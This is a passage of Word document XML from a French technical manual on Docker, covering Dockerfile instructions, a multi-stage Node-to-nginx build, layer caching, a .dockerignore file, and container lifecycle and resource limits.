              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortie du processus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Commande dans le conteneur</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Diagnostic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>inspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Détails complets</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JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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rm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rmi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Supprimer conteneur / image</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Ordre obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>system df</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Espace utilisé</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Premier réflexe de nettoyage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>62.2 Le Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un Dockerfile décrit une suite d'étapes. Chaque instruction crée une couche en cache : l'ordre des instructions détermine la vitesse de reconstruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une construction en trois étapes · dockerfile</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syntax=docker/dockerfile:1</w:t>
        <w:br/>
        <w:t>FROM node:22-alpine AS dependances</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY package.json package-lock.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM node:22-alpine AS construction</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY --from=dependances /app/node_modules ./node_modules</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM nginx:1.27-alpine AS production</w:t>
        <w:br/>
        <w:t>COPY --from=construction /app/dist /usr/share/nginx/html</w:t>
        <w:br/>
        <w:t>COPY nginx.conf /etc/nginx/conf.d/default.conf</w:t>
        <w:br/>
        <w:t>EXPOSE 80</w:t>
        <w:br/>
        <w:t>HEALTHCHECK --interval=30s --timeout=3s \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  CMD wget -qO- http://127.0.0.1/ &gt;/dev/null || exit 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.223 — Sept instructions courantes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Instruction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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305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Conseil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FROM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image de base</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Épingler une version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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WORKDIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Répertoire de travail</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Toujours explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>COPY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Copier des fichiers</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Copier le manifeste d'abord</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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RUN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Exécuter à la construction</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Regrouper et nettoyer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Commande par défaut</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Forme JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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ENTRYPOINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Commande fixe</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Souvent un script d'entrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utilisateur d'exécution</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Ne jamais rester root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un ordre pensé pour le cache · dockerfile</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Ordre des couches : le plus stable d'abord</w:t>
        <w:br/>
        <w:t>COPY package*.json ./      # change rarement</w:t>
        <w:br/>
        <w:t>RUN npm ci                 # cache réutilisé</w:t>
        <w:br/>
        <w:t>COPY src/ ./src            # change souvent</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NE JAMAIS COPIER `NODE_MODULES`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.dockerignore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> évite d'envoyer au démon des dizaines de milliers de fichiers, de rendre le cache inopérant et d'embarquer des binaires incompatibles avec l'image.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un `.dockerignore` minimal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.dockerignore</w:t>
        <w:br/>
        <w:t>node_modules</w:t>
        <w:br/>
        <w:t>.git</w:t>
        <w:br/>
        <w:t>dist</w:t>
        <w:br/>
        <w:t>coverage</w:t>
        <w:br/>
        <w:t>*.log</w:t>
        <w:br/>
        <w:t>.env</w:t>
        <w:br/>
        <w:t>Dockerfile</w:t>
        <w:br/>
        <w:t>README.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>62.3 Cycle de vie et ressources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur s'arrête quand son processus principal se termine. Un conteneur dont le processus principal est un shell lancé sans commande s'arrête immédiatement : c'est une confusion fréquente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux familles de commandes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Cycle de vie</w:t>
        <w:br/>
        <w:t>docker create ... &amp;&amp; docker start &lt;id&gt;</w:t>
        <w:br/>
        <w:t>docker stop web          # SIGTERM puis SIGKILL après 10 s</w:t>
        <w:br/>
        <w:t>docker stop -t 30 web    # laisser 30 s pour finir proprement</w:t>
        <w:br/>
        <w:t>docker restart web</w:t>
        <w:br/>
        <w:t>docker rm -f web</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ressources</w:t>
        <w:br/>
        <w:t>docker run -d --memory 512m --cpus 1.5 --pids-limit 200 mon-app:1.0</w:t>
        <w:br/>
        <w:t>docker update --memory 1g web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.224 — Cinq limites de ressources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35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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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 d'un dépassement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Processus tué (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OOMKilled</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Processeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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--cpus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Ralentissement, pas d'arrêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Processus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--pids-limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3467"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Refus de création</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Redémarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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--restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="346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Relance automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>--log-opt max-size</w:t>
            </w:r>
          </w:p>
